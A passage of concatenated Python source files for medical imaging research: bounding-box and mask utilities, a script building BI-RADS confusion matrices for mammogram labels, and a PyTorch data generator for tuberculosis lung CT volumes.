ymin, ymax = max(0, y-margin), min(y+h+margin, height)
image_patch = image[ymin:ymax, xmin:xmax]
plt.gcf()
if len(image.shape) == 2:
plt.imshow(image, origin=origin, cmap='gray')
else:
plt.imshow(image, origin=origin)
plt.xlim((xmin, xmax))
if origin == 'upper':
ymin, ymax = ymax, ymin
plt.ylim((ymin, ymax))
return image_patch
def get_largest_bbox_coord_from_pixel_array(image_array, max_val=255, threshold=127, min_cnt_size=None):
"""
Convert binary bbox to bbox coordinates.
Note that this assumes that the script only gets the LARGEST connected component in image_array.
The use of this function should be DEPRECATED. For general purpose conversion, use
`get_bbox_coord_list_from_binary_array` instead.
Args:
mask_array: input binary mask in the form of a numpy array
max_val: optional, default to 255 (8-bit)
threshold: optional, defaults to 127
min_cnt_size: if not None, assert contour size > min_cnt_size
Returns:
rects: bbox coordinates in the order of (x, y, w, h)
"""
# Get contours and return the largest
ret, thresh = cv2.threshold(image_array, threshold, max_val, 0)
image, contours, hierarchy = cv2.findContours(thresh, 1, 2)
cnt = max(contours, key=cv2.contourArea)
if min_cnt_size is not None:
assert cv2.contourArea(cnt) > 100, 'max contour are is less than 100 pixels'
# Get coordinates for minimum circumscribing bounding box
rects = cv2.boundingRect(cnt)
return rects
def get_bbox_coord_list_from_binary_array(binary_array,
ignore_pred_under=0,
dilation_kernel_size=0,
bbox_dilation_ratio=1,
bbox_dilation_size=0):
"""Convert a binary array to a list of bbox coordinates in the order (ymin, xmin, ymax, xmax)
Connected component analysis with output = cv2.connectedComponentsWithStats():
Labels = output[1] is an array with the same shape as the input binary array, with each component
labeled with a different integer (BG is 0).
Stats = output[2] is a matrix of the stats that the function calculates. It has a length equal
to the number of labels and a width equal to the number of stats.
It can be used with the OpenCV documentation for it:
Statistics output for each label, including the background label, see below for available statistics.
Statistics are accessed via stats[label, COLUMN] where available columns are defined below.
cv2.CC_STAT_LEFT The leftmost (x) coordinate which is the inclusive start of the bounding box
in the horizontal direction.
cv2.CC_STAT_TOP The topmost (y) coordinate which is the inclusive start of the bounding box
in the vertical direction.
cv2.CC_STAT_WIDTH The horizontal size of the bounding box
cv2.CC_STAT_HEIGHT The vertical size of the bounding box
cv2.CC_STAT_AREA The total area (in pixels) of the connected component
Args:
binary_array: objects are marked with 1
ignore_pred_under: pixel count threshold below which to discard the predicted component
dilation_kernel_size: size of kernel to dilate the binary mask with
bbox_dilation_ratio: bbox_new = bbox * bbox_dilation_ratio + bbox_dilation_size
bbox_dilation_size: bbox_new = bbox * bbox_dilation_ratio + bbox_dilation_size
Returns:
bbox_coord_list:
area_list: a list of connected component areas
"""
assert binary_array.dtype == np.bool
binary_array = binary_array.astype(np.uint8)
# dilate binary mask to connect neightboring components
if dilation_kernel_size > 0:
kernel = np.ones((dilation_kernel_size, dilation_kernel_size), np.uint8)
binary_array = cv2.dilate(binary_array, kernel, iterations=1)
# connected component analysis
bbox_coord_list = []
area_list = []
output = cv2.connectedComponentsWithStats(binary_array)
stats = output[2]
for idx, stat in enumerate(stats):
# in the order of (x, y, w, h, area)
x, y, w, h, area = stat
# skip background component (always the first row)
if idx == 0:
if not (x == 0 and y == 0):
logging.warning(
'The background component did not start at top left corner but at x={}, y={}!'.format(x, y))
continue
if area < ignore_pred_under:
continue
# dilate bbox
x_center = x + w // 2
y_center = y + h // 2
w = w * bbox_dilation_ratio + 2 * bbox_dilation_size
h = h * bbox_dilation_ratio + 2 * bbox_dilation_size
x = x_center - w // 2
y = y_center - h // 2
ymin, xmin, ymax, xmax = y, x, y + h, x + w
# convert to integers
ymin, xmin, ymax, xmax = [int(item) for item in (ymin, xmin, ymax, xmax )]
bbox_coord_list.append((ymin, xmin, ymax, xmax))
area_list.append(area)
if area_list:
# sort by area_list in descending order, the largest bbox is bbox_coord_list[0]
area_list, bbox_coord_list = list(zip(*sorted(zip(area_list, bbox_coord_list), reverse=True)))
return bbox_coord_list, area_list
def get_bbox_coord_for_largest_cc_in_binary_array(binary_array, **kwargs):
bbox = get_bbox_coord_list_from_binary_array(binary_array, **kwargs)[0][0]
return bbox
def get_largest_foreground_mask(image_array, background_value='auto'):
"""Find the largest foreground connected component
Connected component anlaysis with output = cv2.connectedComponentsWithStats():
Labels = output[1] is an array with the same shape as the input binary array, with each component
labeled with a different integer (BG is 0).
Args:
image_array: binary array where background is 0
Returns:
fg_mask_array: boolean numpy array. True for largest foreground connected component
"""
if background_value == 'auto':
# set to 20 percentile of the image
lower_clip = np.percentile(image_array, 5)
upper_clip = np.percentile(image_array, 30)
if np.abs(upper_clip - lower_clip) / np.max(image_array) < 0.02:
background_value = upper_clip
else:
logging.warning('difference 5th and 30th percentile is {}\nManually inspect this image'.format(
np.abs(upper_clip - lower_clip)))
background_value = lower_clip
else:
assert isinstance(background_value, np.int)
binary_array = image_array > background_value
output = cv2.connectedComponentsWithStats(binary_array.astype(np.uint8))
stats = output[2]
if len(stats) > 1 :
# if there are at least two components returned
# find the idx of the largest fg component by area (excluding 0th row, i.e., the BG)
idx = np.argmax(stats[1:, -1]) + 1
fg_mask_array = (output[1] == idx)
else:
logging.debug('Only one component in the image. Check raw image!')
fg_mask_array = None
return fg_mask_array
def get_ar(bbox):
"""Get aspect ratio of bbox"""
ymin, xmin, ymax, xmax = bbox
width, height = xmax - xmin, ymax - ymin
ar = max(width, height) / min(width, height)
return ar
def large_ar_suppression(boxes, ar_threshold=2):
"""Filter out bbox with aspect ratio larger than ar_threshold"""
return [bbox for bbox in boxes if get_ar(bbox) <= ar_threshold]
def get_minmax_size(bbox):
"""Get aspect ratio of bbox"""
ymin, xmin, ymax, xmax = bbox
width, height = xmax - xmin, ymax - ymin
min_size = min(width, height)
max_size = max(width, height)
return min_size, max_size
def non_max_suppression_fast(boxes, threshold=0.5, option='union', max_iterations=1):
""" NMS to combine bboxes
Adapted from https://www.pyimagesearch.com/2015/02/16/faster-non-maximum-suppression-python/
Args:
boxes: in the order of (ymin, xmin, ymax, xmax)
overlapThresh:
option: method to postprocess the bbox coordinates
'union': find the bbox for the union of the overlapping boxes
'original': find the original bbox, from right to left
Returns:
"""
def concate_list(arrays, concateidx):
"""method to help track the resource of combined bounding boxes
Args:
arrays: list of list, represent the indices
concateidx: indices of list to be merged
Returns: merged flat list
"""
result = []
for idx in concateidx:
result.extend(arrays[idx])
return result
merged_boxes_sources = [[i] for i in list(range(len(boxes)))]
for i_iter in range(max_iterations):
num_bbox_before_nms = len(boxes)
# if there are no boxes, return an empty list
if num_bbox_before_nms == 0:
return [], []
# if the bounding boxes integers, convert them to floats --
# this is important since we'll be doing a bunch of divisions
boxes = np.array(boxes).astype("float")
# grab the coordinates of the bounding boxes
# x1, y1 == xmin, ymin
# x2, y2 == xmax, ymax
y1 = boxes[:, 0]
x1 = boxes[:, 1]
y2 = boxes[:, 2]
x2 = boxes[:, 3]
# compute the area of the bounding boxes and sort the bounding
# boxes by the bottom-right y-coordinate of the bounding box
area = (x2 - x1 + 1) * (y2 - y1 + 1)
idxs = np.argsort(y2)
merged_boxes = []
new_merged_boxes_sources = []
# keep looping while some indexes still remain in the indexes list
while len(idxs) > 0:
# grab the last index in the indexes list and add the
# index value to the list of picked indexes
last = len(idxs) - 1
i = idxs[last]
# find the largest (x, y) coordinates for the start of
# the bounding box and the smallest (x, y) coordinates
# for the end of the bounding box
xx1 = np.maximum(x1[i], x1[idxs[:last]])
yy1 = np.maximum(y1[i], y1[idxs[:last]])
xx2 = np.minimum(x2[i], x2[idxs[:last]])
yy2 = np.minimum(y2[i], y2[idxs[:last]])
# compute the width and height of the bounding box
w = np.maximum(0, xx2 - xx1 + 1)
h = np.maximum(0, yy2 - yy1 + 1)
# compute the ratio of overlap
# NB. use the area of the moving box as overlap denominator
# <TODO> add union area calculation
overlap = (w * h) / area[idxs[:last]]
# delete all indexes from the index list
idxs_idx_to_delete = np.concatenate(([last],
np.where(overlap > threshold)[0]))
if option == 'union':
# return the bbox of the union
xx1 = np.min(x1[idxs[idxs_idx_to_delete]])
yy1 = np.min(y1[idxs[idxs_idx_to_delete]])
xx2 = np.max(x2[idxs[idxs_idx_to_delete]])
yy2 = np.max(y2[idxs[idxs_idx_to_delete]])
merged_boxes.append((yy1, xx1, yy2, xx2))
# merged_boxes_sources.append(idxs[idxs_idx_to_delete])
new_merged_boxes_sources.append(concate_list(merged_boxes_sources, idxs[idxs_idx_to_delete]))
elif option == 'original':
merged_boxes.append(boxes[i])
merged_boxes_sources.append(i)
else:
raise ValueError('Unsupported option {}'.format(option))
idxs = np.delete(idxs, idxs_idx_to_delete)
merged_boxes = np.array(merged_boxes).astype(np.int)
# the original bbox coord
boxes = merged_boxes
merged_boxes_sources = new_merged_boxes_sources
num_bbox_after_nms = len(boxes)
# no bbox has been merged in this iteration
if num_bbox_before_nms == num_bbox_after_nms:
logging.debug('Finish NMS at {} out of {} requested iterations'.format(i_iter + 1, max_iterations))
return boxes, merged_boxes_sources
return boxes, merged_boxes_sources
def calculate_union_area(boxes):
""" calculate the union area of several bounding boxes
Args:
boxes: list of bounding boxes, each one in the order of (ymin, xmin, ymax, xmax)
Returns: union area
"""
# convert to np array if the input is a list
boxes = np.array(boxes)
width = max(boxes[:, 3])
height = max(boxes[:, 2])
canvas = np.zeros([width + 1, height + 1])
for i in range(len(boxes)):
canvas[boxes[i, 1]:boxes[i, 3] + 1, boxes[i, 0]:boxes[i, 2] + 1] = 1
return np.sum(canvas)
def _get_valid_length(line_scan):
"""Helper function for calculating valid length in one line_scan.
Used in calculate_union_area_v2
"""
sum_length = 0
acc = 0
last_x = 0
for current_x in sorted(line_scan):
if acc > 0:
sum_length += current_x - last_x
acc += line_scan[current_x]
last_x = current_x
return sum_length
def calculate_union_area_v2(boxes):
"""Calculate the union area of several bounding boxes
This algorithm is inspired by numerical integration.
Scan a line through the whole image. Calculate the 'valid length (height)'
of each scanning position, and the intervals (width) during which the
'valid length' stays the same.
Args:
boxes: list of bounding boxes, each one in the order of (ymin, xmin, ymax, xmax)
Returns: union area
"""
# convert to np array if the input is a list
boxes = np.array(boxes)
START = 1
END = -START
# key: y axis of the changing line
# value list of tuple(x axis,status(beginning/ending of a meeting) )
boundary = {}
for box in boxes:
y0, x0, y1, x1 = box
if y0 not in boundary:
boundary[y0] = []
if y1 + 1 not in boundary:
boundary[y1 + 1] = []
# starting and ending of a bounding box are 'changing lines'
# since in our case, area means number of pixels
# and [x0,x1],[y0,y1] are inclusive,
# so '+1' is needed for x1 and y1
# in line y0, a meeting starts at x0 and ends at x1
boundary[y0].append((x0, START))
boundary[y0].append((x1 + 1, END))
# in line y1 + 1, there will be no more meeting
# the effect needs to be negated
boundary[y1 + 1].append((x0, END))
boundary[y1 + 1].append((x1 + 1, START))
# valid length in each line is equivalent to
# 'meeting scheduling' interview problem.
# previous line's y value with a changing line scan
# first value does not matter
# as long as valid_length is set to 0 at first
last_y = -1
valid_length = 0
area_sum = 0
# one line scan over the 2d space.
# key is x
# value is summation of status(1/-1)
# 1 means beginning of bounding box
# -1 means ending of bounding box
# changes over y
line_scan = {}
for current_y in sorted(boundary):
# valid length stay the same for [last_y, current_y]
area_sum += (current_y - last_y) * valid_length
last_y = current_y
# update the status of line scan
for pair in boundary[current_y]:
x = pair[0]
status = pair[1]
line_scan[x] = line_scan.get(x, 0) + status
if not line_scan[x]:
del line_scan[x]
valid_length = _get_valid_length(line_scan)
return area_sum
def calc_cluster(bboxes, threshold=0, max_iterations=100):
"""Calculate clusters given a list of bbox coordinates. Return
Args:
threshold: merging overlap. Defaults to 0, meaning that if two bbox are merged if they touch
max_iterations: this should be set to a sufficiently high number to ensure merged cluster is clean
bboxes: list of bounding boxes, each one in the order of (ymin, xmin, ymax, xmax)
and represents a single calcification
Returns:
merged_source_list: list of list of bbox idx (corresponding to the input list)
union_area_list: list of areas of each merged cluster
count_list: list of counts in each merged cluster
density_list: list of number density
"""
# TODO select better nms parameters
bboxes = np.array(bboxes)
merged_bbox_list, merged_source_list = non_max_suppression_fast(bboxes, threshold=threshold, max_iterations=max_iterations)
union_area_list = []
count_list = []
density_list = []
for merged_idxs in merged_source_list:
union_area = calculate_union_area(bboxes[merged_idxs])
union_area_list.append(union_area)
for idx in range(len(merged_source_list)):
count = len(merged_source_list[idx])
density = count / union_area_list[idx]
count_list.append(count)
density_list.append(density)
return merged_bbox_list, merged_source_list, union_area_list, count_list, density_list
def bbox_list_intersect(bbox_list_list, threshold=0.1):
"""
Args:
bbox_list_list: a list of bbox_list. Each bbox_list comes form one source, so len(bbox_list_list) is the
number of sources
Returns:
"""
# print(bbox_list_list)
flat_bbox_list = [x for xx in bbox_list_list for x in xx]
bbox_list, source_list = non_max_suppression_fast(flat_bbox_list, threshold=threshold)
# print(source_list)
class_len_list = [len(bbox_list) for bbox_list in bbox_list_list]
def map_index_to_source_class(index, class_len_list):
"""Convert an index in a concatenated list to the list index
For example, index 5 in a concatenated list from 3 lists with length [3, 1, 4] belongs to the
third list, thus returns 2.
"""
cumsum_list = np.cumsum(class_len_list)
assert index < np.max(cumsum_list) and index >= 0, 'index is {}'.format(index)
return min(np.argwhere([index < cumsum for cumsum in np.cumsum(class_len_list)]))[0]
source_list = [[map_index_to_source_class(x, class_len_list) for x in xx] for xx in source_list]
# print(source_list)
bbox_list_intersected = []
for bbox_coord, source in zip(bbox_list, source_list):
if len(set(source)) == len(class_len_list):
bbox_list_intersected.append(bbox_coord)
# print(bbox_list_intersected)
return bbox_list_intersected
def combine_mask_images(mask_search_path1, mask_search_path2, mask_output_dir, method='intersection'):
"""Read in masks, find intersection or union of annotation and write out to file
Notes: This function currently only supports two sources. To extend to multiple sources:
1. Change argument to a list of search paths
2. Call PairedDictGenerator recursively
Args:
mask_search_path1:
mask_search_path2:
mask_output_dir:
method: 'intersection' or 'union'
"""
assert method in ['intersection', 'union']
join = 'inner' if method == 'intersection' else 'outer'
generator = patch.PairedDictGenerator(mask_search_path1, mask_search_path2, output_dir=mask_output_dir,
mask_suffix='.png', image_suffix='.png')
paired_dict = generator.get_paired_image_and_mask(key_names=('mask1', 'mask2'), join=join)
keys = sorted(paired_dict.keys())
for key in tqdm(keys[:]):
# read in mask arrays
mask_array_list = []
for dataset in paired_dict[key].keys():
mask_path = paired_dict[key][dataset]
if os.path.isfile((mask_path)):
mask_array = plt.imread(mask_path, -1)
else:
continue
mask_array_list.append(mask_array)
assert mask_array_list, 'no mask found for key {}'.format(key)
# generate union mask
canvas = None
for mask_array in mask_array_list:
try:
if method == 'intersection':
canvas *= mask_array.astype(np.bool)
else:
canvas += mask_array.astype(np.bool)
except:
canvas = mask_array.astype(np.bool)
# write generated mask to file
mask_output_path = os.path.join(mask_output_dir, '{}_{}.png'.format(key, method))
cv2.imwrite(mask_output_path, (canvas * 255).astype(np.uint8))
def clip_to_boundary(bbox, canvas_shape):
"""Clip bbox coordinates to canvas shape
Args:
bbox:
canvas_shape:
Returns:
"""
ymin, xmin, ymax, xmax = bbox
assert len(canvas_shape) == 2, 'canvas shape {} is not 2D!'.format(canvas_shape)
height, width = canvas_shape
# crop to boundary
ymin = max(ymin, 0)
xmin = max(xmin, 0)
ymax = min(ymax, height)
xmax = min(xmax, width)
assert ymax - ymin > 1 and xmax - xmin > 1, 'Bbox too small, invalid crop!'
bbox = (ymin, xmin, ymax, xmax)
return bbox
def crop_by_bbox(image_array, bbox):
"""
Args:
image_array: 2d or 3d array
bbox: in the order of (ymin, xmin, ymax, xmax)
Returns:
"""
canvas_shape = image_array.shape[:2]
bbox = clip_to_boundary(bbox, canvas_shape=canvas_shape)
ymin, xmin, ymax, xmax = bbox
image_array = image_array[ymin:ymax, xmin:xmax, ...]
return image_array
def poly_approx(contours, approx_tol=0.01):
"""Approximate contours with polygon
Args:
contours:
approx_tol:
Returns:
"""
poly_contours = []
for c in contours:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, approx_tol * peri, True)
poly_contours.append(approx)
return poly_contours
def is_point_inside_contour(point, contour):
"""Tell if a point is inside a contour
Args:
point: in the order of (x, y) per cv2
contour:
Returns:
"""
is_inside = cv2.pointPolygonTest(contour, point, measureDist=False) > 0
return is_inside
def fill_holes(image, thresh=0.001):
"""Fill holes in a binary image
Args:
image:
thresh:
Returns:
"""
from skimage.morphology import reconstruction
seed = np.copy(image)
seed[1:-1, 1:-1] = image.max()
mask = image
filled = reconstruction(seed, mask, method='erosion')
# filled = (filled > thresh).astype(np.uint8)
return filled
<file_sep>import os
import pandas as pd
import itertools
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
class ConfusionMatrixGenerater(object):
def __init__(self, image_data, csvfile):
self.image_data = image_data
self.csvfile = csvfile
self.df = pd.read_csv(csvfile)
self.biradsmap = {0.0: "bi-rads0", 1.0:"bi-rads1", 2.0:"bi-rads2", 3.0:"bi-rads3", 4.0:"bi-rads4",
4.1: "bi-rads4a", 4.2:"bi-rads4b", 4.3:"bi-rads4c", 5.0:"bi-rads5"}
def gen_dict_from_csv(self):
"""
create a dictionary that stores ziwei's birads label
key: image name "pid-laterality", e.g. 111-L
value: birads-num as csv file showed
choose the highest birads to store
"""
ziwei_birads = {}
for i in range(len(self.df["index"])):
patient_idx = self.df["index"][i].split("-")[0]
# laterality_idx = df["index"][i].split("-")[1]
if self.df["index"][i].split("-")[1] == str(1) or self.df["index"][i].split("-")[1] == str(3):
laterality = "R"
elif self.df["index"][i].split("-")[1] == str(2) or self.df["index"][i].split("-")[1] == str(4):
laterality = "L"
else:
print("wrong laterality ", self.df["index"][i])
image_idx = patient_idx + "-" + laterality
if image_idx not in ziwei_birads.keys():
ziwei_birads[image_idx] = float(self.df["birads_num"][i])
else:
if ziwei_birads[image_idx] < float(self.df["birads_num"][i]):
ziwei_birads[image_idx] = float(self.df["birads_num"][i])
"""
convert the num to real birads class, like bi-rads2, etc
"""
ziwei_birads_new = {}
for patient in ziwei_birads:
ziwei_birads_new[patient] = self.biradsmap[ziwei_birads[patient]]
return ziwei_birads_new
def gen_dict_from_txt(self):
"""
create a dictionary that stores the original comments.txt file info
key: image name "pid-laterality", e.g. 111-L
value: birads
"""
image_comment = {}
for patient in os.listdir(self.image_data):
if os.path.isdir(os.path.join(self.image_data, patient)):
comment_path = os.path.join(self.image_data, patient, "comments.txt")
# print(comment_path)
with open(comment_path, "r", encoding='utf-8') as f:
info = f.readlines()
for i in range(len(info)):
if "left" in info[i].lower():
left_birads = info[i].split(":")[-1].lower().replace(" ", "").replace("\n","")
image_comment[patient+"-L"] = left_birads
if "right" in info[i].lower():
right_birads = info[i].split(":")[-1].lower().replace(" ", "").replace("\n","")
image_comment[patient+"-R"] = right_birads
return image_comment
def gen_confustion_matrix(self, class_names):
csv_dict = self.gen_dict_from_csv()
txt_dict = self.gen_dict_from_txt()
ziwei_list = []
img_comment_list = []
# wrong_list = []
count = 0
for img in csv_dict.keys():
if img in txt_dict.keys():
count += 1
ziwei_list.append(csv_dict[img])
img_comment_list.append(txt_dict[img])
cnf_matrix = confusion_matrix(img_comment_list, ziwei_list, labels=class_names)
np.set_printoptions(precision=2)
return cnf_matrix
@staticmethod
def plot_confusion_matrix(cm, classes, xlabel, ylabel,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
generate two lists that stores the bi-rads info
corresponding info stores at the same slot index
"""
plt.figure()
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel(ylabel)
plt.xlabel(xlabel)
plt.show()
if __name__ == "__main__":
img_data = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/ChinaLQ_Display_1"
csvfile = r"/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/china_bbox.csv"
class_names = ["bi-rads0", "bi-rads1", "bi-rads2", "bi-rads3", "bi-rads4", "bi-rads4a", "bi-rads4b",
"bi-rads4c", "bi-rads5"]
cmg = ConfusionMatrixGenerater(img_data, csvfile)
cnf_matrix = cmg.gen_confustion_matrix(class_names)
cmg.plot_confusion_matrix(cnf_matrix, class_names, "ziwei", "hospital")
<file_sep>'''
data generator for the global local net
v0: for resnet34 only
v1: for global local with only local path, prepare the data for the input['local']
'''
import torch
from torch.utils.data import Dataset, DataLoader
import torchvision
from torchvision import transforms, utils
import pandas as pd
import random
import os
import math
# from skimage import io, transform
import numpy as np
import cv2
from time import time
from PIL import Image
import matplotlib.pyplot as plt
import scipy.io as sio
import imgaug as ia
from imgaug import augmenters as iaa
from sampler import BalancedBatchSampler
plt.ion()
class dataconfig(object):
def __init__(self, dataset = 'defaut',subset = '0', **kwargs):
self.dataset = dataset
self.dir = r'C:\Users\Xing\Projects\TB2020\code\ecg_classification_torch\code'
self.csv = 'TB_label_0426.csv'
self.subset = subset
self.csv_file = os.path.join(self.dir,self.csv)
class batch_sampler():
def __init__(self, batch_size, class_list):
self.batch_size = batch_size
self.class_list = class_list
self.unique_value = np.unique(class_list)
self.iter_list = []
self.len_list = []
for v in self.unique_value:
indexes = np.where(self.class_list == v)[0]
self.iter_list.append(self.shuffle_iterator(indexes))
self.len_list.append(len(indexes))
self.len = len(class_list) // batch_size
# print('self.len: ', self.len)
def __iter__(self):
index_list = []
for _ in range(self.len):
for index in range(self.batch_size):
index_list.append(next(self.iter_list[index % len(self.unique_value)]))
np.random.shuffle(index_list)
yield index_list
index_list = []
def __len__(self):
return self.len
@staticmethod
def shuffle_iterator(iterator):
# iterator should have limited size
index = list(iterator)
total_size = len(index)
i = 0
random.shuffle(index)
while True:
yield index[i]
i += 1
if i >= total_size:
i = 0
random.shuffle(index)
class DataGenerator(Dataset):
def __init__(self, config=None,transform = None,type='0.simplist'):
self.config = config
self.imgsz = 256
self.conlen = 32
self.debug = False
self.df = self.parse_csv(self.config.csv_file, self.config.subset)
self.df.reset_index(drop=True, inplace=True)
self.transform = transform
self.type = type
def __len__(self):
# if self.config.subset == '0':
# print('len = {}'.format(2*len(self.df)))
# return 2*len(self.df)
print('len = {}'.format(len(self.df)))
return len(self.df)
def img_augmentation(self,img,seq_det):
img = img.transpose(2,0,1).astype(np.float32)
for i in range(len(img)):
img[i,:,:] = seq_det.augment_images(img[i,:,:])
img = img.transpose(1,2,0).astype(np.float64)
return img
def img_generator(self,index,data,con_len,ss=1):
# 0.simplist just pick the center 48 slices from data and msk and concat them together
img = np.zeros([self.imgsz, self.imgsz, con_len])
img_l = np.zeros([self.imgsz, self.imgsz, con_len])
img_s = np.zeros([self.imgsz, self.imgsz, con_len])
img_b = np.zeros([self.imgsz, self.imgsz, con_len])
msk = np.zeros([self.imgsz, self.imgsz, con_len])
msk1 = np.zeros([self.imgsz, self.imgsz, con_len])
if self.type == '0.simplist':
img_len = self.df.loc[index,'len']
center_i = img_len // 2
if con_len <= img_len:
start_i = center_i - con_len//2
end_i = start_i+con_len
img = data['data'][:, :, start_i:end_i]
msk = data['mask'][:, :, start_i:end_i]
else:
start_i = con_len//2 - img_len//2
end_i = start_i+img_len
img[:,:,start_i:end_i] = data['data']
msk[:,:,start_i:end_i] = data['mask']
elif self.type == '1: slice_sampled':
img_len = self.df.loc[index, 'len']
center_i = img_len // 2
ds = self.df.loc[index,'ds']
if ds == 1:
ds = ss*ds
else:
ds = ss*ds//2
if ds*con_len <= img_len:
start_i = center_i - ds*con_len // 2
end_i = start_i + ds*con_len
img = data['data'][:, :, start_i:end_i:ds]
msk = data['mask'][:, :, start_i:end_i:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
else:
start_i = con_len // 2 - img_len // 2 //ds
end_i = start_i + img_len//ds
img[:, :, start_i:end_i] = data['data'][:,:,0:img_len:ds]
msk[:, :, start_i:end_i] = data['mask'][:,:,0:img_len:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
print(index, ds, img_len, start_i, end_i)
elif self.type == '1: slice_sampled_window':
img_len = self.df.loc[index, 'len']
center_i = img_len // 2
ds = self.df.loc[index,'ds']
if ds == 1:
ds = ss*ds
else:
ds = ss*ds//2
if ds*con_len <= img_len:
start_i = center_i - ds*con_len // 2
end_i = start_i + ds*con_len
img = data['data'][:, :, start_i:end_i:ds]
msk = data['mask'][:, :, start_i:end_i:ds]
img_l = data['data_l'][:, :, start_i:end_i:ds]
img_s = data['data_s'][:, :, start_i:end_i:ds]
img_b = data['data_b'][:, :, start_i:end_i:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
else:
start_i = con_len // 2 - img_len // 2 //ds
end_i = start_i + img_len//ds
img[:, :, start_i:end_i] = data['data'][:,:,0:img_len:ds]
msk[:, :, start_i:end_i] = data['mask'][:,:,0:img_len:ds]
img_l[:, :, start_i:end_i] = data['data_l'][:, :, 0:img_len:ds]
img_s[:, :, start_i:end_i] = data['data_s'][:, :, 0:img_len:ds]
img_b[:, :, start_i:end_i] = data['data_b'][:, :, 0:img_len:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
print(index, ds, img_len, start_i, end_i)
elif self.type == '2: slice_sampled_aug':
img_len = self.df.loc[index, 'len']
center_i = img_len // 2
ds = self.df.loc[index,'ds']
ds = ss*ds
if ds == 1:
ds = ss*ds
else:
ds = ss*ds//2
if ds*con_len <= img_len:
start_i = center_i - ds*con_len // 2
end_i = start_i + ds*con_len
img = data['data'][:, :, start_i:end_i:ds]
msk = data['mask'][:, :, start_i:end_i:ds]
msk1 = data['mask1'][:, :, start_i:end_i:ds]
else:
start_i = con_len // 2 - img_len // 2 //ds
end_i = start_i + img_len//ds
img[:, :, start_i:end_i] = data['data'][:,:,0:img_len:ds]
msk[:, :, start_i:end_i] = data['mask'][:,:,0:img_len:ds]
msk1[:, :, start_i:end_i] = data['mask1'][:, :, 0:img_len:ds]
print(index, ds, img_len, start_i, end_i)
elif self.type == '3: slice_avg_window':
img_len = self.df.loc[index, 'len']
center_i = img_len // 2
ds = self.df.loc[index,'ds']
if ds == 1:
ds = ss*ds
else:
ds = ss*ds//2
if ds*con_len <= img_len:
start_i = center_i - ds*con_len // 2
end_i = start_i + ds*con_len
img = data['data'][:, :, start_i:end_i:ds]
msk = data['mask'][:, :, start_i:end_i:ds]
img_l = data['data_l'][:, :, start_i:end_i:ds]
img_s = data['data_s'][:, :, start_i:end_i:ds]
img_b = data['data_b'][:, :, start_i:end_i:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
else:
start_i = con_len // 2 - img_len // 2 //ds
end_i = start_i + img_len//ds
img[:, :, start_i:end_i] = data['data'][:,:,0:img_len:ds]
msk[:, :, start_i:end_i] = data['mask'][:,:,0:img_len:ds]
img_l[:, :, start_i:end_i] = data['data_l'][:, :, 0:img_len:ds]
img_s[:, :, start_i:end_i] = data['data_s'][:, :, 0:img_len:ds]
img_b[:, :, start_i:end_i] = data['data_b'][:, :, 0:img_len:ds]
#msk1 = data['mask1'][:, :, start_i:end_i:ds]
print(index, ds, img_len, start_i, end_i)
dec = random.choice(range(4))
if dec == 1 and self.df.loc[index,'valid'] == '0':
#print('{} is img_auged'.format(index))
seq = iaa.SomeOf((3, 6), [
#iaa.Fliplr(0.8),
#iaa.Flipud(0.8),
iaa.Multiply((0.8, 1.2)),
iaa.GaussianBlur(sigma=(0.0, 0.2)),
iaa.PiecewiseAffine((0.02, 0.06)),
iaa.Affine(
# rotate=(-5, 5),
shear=(-5, 5),
scale=({'x': (0.8, 1.1), 'y': (0.8, 1.1)}) # to strentch the image along x,y axis
)
])
seq_det = seq.to_deterministic()
img = self.img_augmentation(img,seq_det=seq_det)
img_l = self.img_augmentation(img_l, seq_det=seq_det)
img_s = self.img_augmentation(img_s, seq_det=seq_det)
img_c = np.array([img,img_l,img_s,img])
#print('{} is read'.format(index))
return img_c
def lab_generator(self,index):
cls = {
'1':'LeftLungAffected',
'2':'RightLungAffected',
'3':'CavernsLeft',
'4':'CavernsRight',
'5':'PleurisyLeft',
'6':'PleurisyRight'
}
label = []
for i in range(len(cls)):
label.append(self.df.loc[index,cls[str(i+1)]])
return label
def __getitem__(self, index):
if self.imgsz == 256:
img_path = self.df.loc[index, 'data_path']
elif self.imgsz == 512:
img_path = self.df.loc[index, 'data_path_512']
# print(img_path)
# image = cv2.imread(img_path)
data = sio.loadmat(img_path)
image = self.img_generator(index,data,con_len = self.conlen,ss= 1)
#image = image.reshape(3,48,256,256)
image = image.transpose(0,3,1,2)
label = np.array(self.lab_generator(index))
# label = label.reshape(-1,1)
# landmarks = landmarks.reshape(-1, 2)
# sample = {'image': image, 'label': label}
if self.transform:
image = self.transform(image)
if self.debug:
print('data generator debug:',image.shape)
plt.imshow(np.squeeze(image[1,24,:,:]))
return image,label
@staticmethod
def parse_csv(csv_file, subset):
data_frame = pd.read_csv(csv_file)
data_frame = data_frame[data_frame['valid'] == int(subset)]
return data_frame
def show_landmarks(image, landmarks):
"""SHow image with landmarks"""
plt.imshow(image)
# plt.scatter(landmarks[:, 0], landmarks[:, 1], s=10, marker=".", c="r")
if __name__ == "__main__":
# config = {"aug": True, "subset": 'training', "save_img": True, "add_noise": False}
# config = {"dataset": 'mammo_calc',"subset": '0'}
# train_config = dataconfig(**config)
# train_dataset = DataGenerator(train_config,transform= transforms.ToTensor())
#
#
# train_dataloader = DataLoader(train_dataset, num_workers=1, batch_size=4,shuffle= True)
#
# num_classes = 1
